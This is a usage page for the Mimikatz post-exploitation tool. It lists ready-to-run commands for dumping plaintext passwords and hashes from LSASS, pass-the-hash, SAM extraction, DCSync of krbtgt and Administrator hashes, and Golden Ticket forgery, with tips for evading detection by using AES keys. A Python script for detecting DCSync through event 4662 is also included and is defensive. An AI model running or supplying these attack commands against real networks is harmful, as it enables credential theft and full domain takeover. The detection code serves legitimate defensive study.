
Mimikatz

Extract plaintext passwords, hashes, PIN codes and Kerberos tickets

C / C++ | GitHub

Overview

Mimikatz is a leading Windows post-exploitation tool written in C by Benjamin Delpy (gentilkiwi). It is best known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory, chiefly from the LSASS process. It also performs credential-abuse attacks such as Pass-the-Hash, Pass-the-Ticket and Golden Ticket forgery, and can pull account secrets straight from a domain controller with DCSync.

Key Features

  • Extract credentials (passwords, NT hashes, Kerberos keys and tickets) from LSASS memory (sekurlsa module).
  • Forge Golden and Silver tickets (kerberos module).
  • Perform Pass-the-Hash (PtH) and Overpass-the-Hash attacks.
  • Dump LSA secrets, cached domain credentials and the local SAM (lsadump module); export certificates and private keys (crypto module).
  • DCSync: pull password hashes directly from a domain controller over the directory replication protocol (DRSUAPI), without touching LSASS or NTDS.dit on the DC.

Prerequisites

  • To extract credentials from LSASS memory you must run as a local administrator (or SYSTEM) and hold SeDebugPrivilege; privilege::debug enables that privilege in the current token. On hosts where LSASS runs as a Protected Process Light (RunAsPPL) or Credential Guard isolates the secrets, the sekurlsa commands fail against the live process even with these privileges.
  • DCSync needs no privileges on the DC host at all, only a domain account holding the directory replication rights listed in the DCSync section below.

Usage Examples

Extracting Credentials (LogonPasswords)

TEXT
# Enable SeDebugPrivilege in the current token (expect "Privilege '20' OK"), then dump
# every logon session's credentials (passwords, NT hashes, Kerberos keys) from LSASS
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Passing the Hash (PtH)

Start a new process (cmd.exe by default; another program can be given with /run:) whose logon session carries the supplied NT hash instead of a password. Any network authentication that process performs (SMB, WMI, RDP with restricted admin, and so on) succeeds as the target user without the plaintext. Against Kerberos, the injected hash is used as the RC4-HMAC key to request a TGT, so the same command is also an Overpass-the-Hash. The hash below is a placeholder.

TEXT
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:Administrator /domain:target.local /ntlm:1234567890abcdef1234567890abcdef

Dumping the SAM Database (Local Hashes)

Retrieve the NT hashes of local accounts from the SAM hive. token::elevate impersonates SYSTEM, which is required to read the SAM and SYSTEM registry keys; lsadump::sam then recovers the boot key from SYSTEM and decrypts the hashes. The same command also works offline against exported hives via its /sam: and /system: options.

TEXT
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

DCSync (Domain Hash Extraction)

Impersonate a domain controller: mimikatz calls the Directory Replication Service (DRSUAPI) on a real DC and asks it to replicate a single account, which returns that account's NT hash, password history and Kerberos keys. No code runs on the DC and nothing is read from NTDS.dit on disk. The calling account needs the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object; Domain Admins, Enterprise Admins and domain controller computer accounts hold them by default.

TEXT
# Dump the krbtgt hash (essential for Golden Tickets)
mimikatz # lsadump::dcsync /user:target\krbtgt /domain:target.local

# Dump the administrator hash
mimikatz # lsadump::dcsync /user:target\Administrator /domain:target.local
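Because DCSync is a legitimate replication request, the clean way to catch it is on the DC side: with "Audit Directory Service Access" enabled, each replication request is logged as Security event 4662 whose Properties field names the control-access rights exercised, and only DCs (and a few replication services) should ever exercise them. The following is an added detection example written for this page, not mimikatz code: the replication-right GUIDs are the real AD schema values, while the sample events, the ALLOWED list and the function names are constructed for the example.

```python
"""Detect DCSync (lsadump::dcsync) from Windows Security event 4662 records.

Added example, not part of mimikatz. With "Audit Directory Service Access"
enabled on a DC, a DRSUAPI replication request is logged as event 4662 whose
Properties field carries the control-access rights that were exercised. Only
domain controllers (and known replication services such as Azure AD Connect)
legitimately hold those rights, so any other subject exercising them is a
strong DCSync indicator. The sample events below are constructed.
"""

# schemaIDGUIDs of the replication extended rights in Active Directory
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended (control-access) right is used


def exercised_replication_rights(event):
    """Return the replication rights named in a 4662 event's Properties field."""
    props = event.get("Properties", "").lower()
    return {g for g in REPLICATION_RIGHTS if g in props}


def is_dcsync(event, allowed_subjects):
    """True if a non-allowlisted principal exercised replication rights."""
    if event.get("EventID") != 4662:
        return False
    if int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
        return False
    if not exercised_replication_rights(event):
        return False
    subject = event.get("SubjectUserName", "").upper()
    return subject not in {s.upper() for s in allowed_subjects}


def find_dcsync(events, allowed_subjects):
    """Filter a list of event dicts down to the DCSync candidates."""
    return [e for e in events if is_dcsync(e, allowed_subjects)]


# Constructed sample events (fields mirror the 4662 template, values are made up).
SAMPLE_EVENTS = [
    {   # normal replication between two domain controllers
        "EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "TARGET",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",  # domainDNS
        "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # a user account replicating the domain: this is what lsadump::dcsync produces
        "EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "TARGET",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
        "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # the same user reading an unrelated object: not replication
        "EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "TARGET",
        "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",  # user class (constructed)
        "AccessMask": "0x10",
        "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}",
    },
    {   # an unrelated logon event, ignored
        "EventID": 4624, "SubjectUserName": "jdoe", "SubjectDomainName": "TARGET",
    },
]

# Assumed allowlist: the domain's DC computer accounts. Add Azure AD Connect or
# similar replication service accounts here in a real deployment.
ALLOWED = {"DC01$", "DC02$"}

if __name__ == "__main__":
    for hit in find_dcsync(SAMPLE_EVENTS, ALLOWED):
        rights = ", ".join(sorted(exercised_replication_rights(hit)))
        print(f"possible DCSync by {hit['SubjectDomainName']}\\{hit['SubjectUserName']} ({rights})")
```

The allowlist is deliberately a set of subject names rather than "ends with $": an attacker who has compromised a workstation's machine account also has a name ending in $, so the check must be against the DCs you actually have. Tuning is mainly about adding the legitimate non-DC replicators your environment runs.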

Crafting a Golden Ticket

With the krbtgt account's key you can forge a TGT offline. A domain controller validates a TGT only by decrypting it with the krbtgt key, so the forged ticket, and the PAC inside it whose user name, RID and group SIDs you choose, is accepted as genuine. By default mimikatz gives the ticket a 10-year lifetime (/endin), far beyond any domain policy, and it stays usable until the krbtgt password has been changed twice. /sid is the domain SID without a trailing RID, /id:500 gives the ticket the built-in Administrator's RID, and the user name need not exist in the domain. Supplying the NT hash via /rc4 produces an RC4-encrypted TGT, which stands out in domains where AES is the default; passing the krbtgt AES key via /aes256 blends in better. /ptt injects the ticket into the current session, where kerberos::list shows it.

TEXT
# Create and automatically inject the ticket
mimikatz # kerberos::golden /domain:target.local /sid:S-1-5-21-XXX-YYY-ZZZ /rc4:KRBTGT_NTLM_HERE /user:FakeAdmin /id:500 /ptt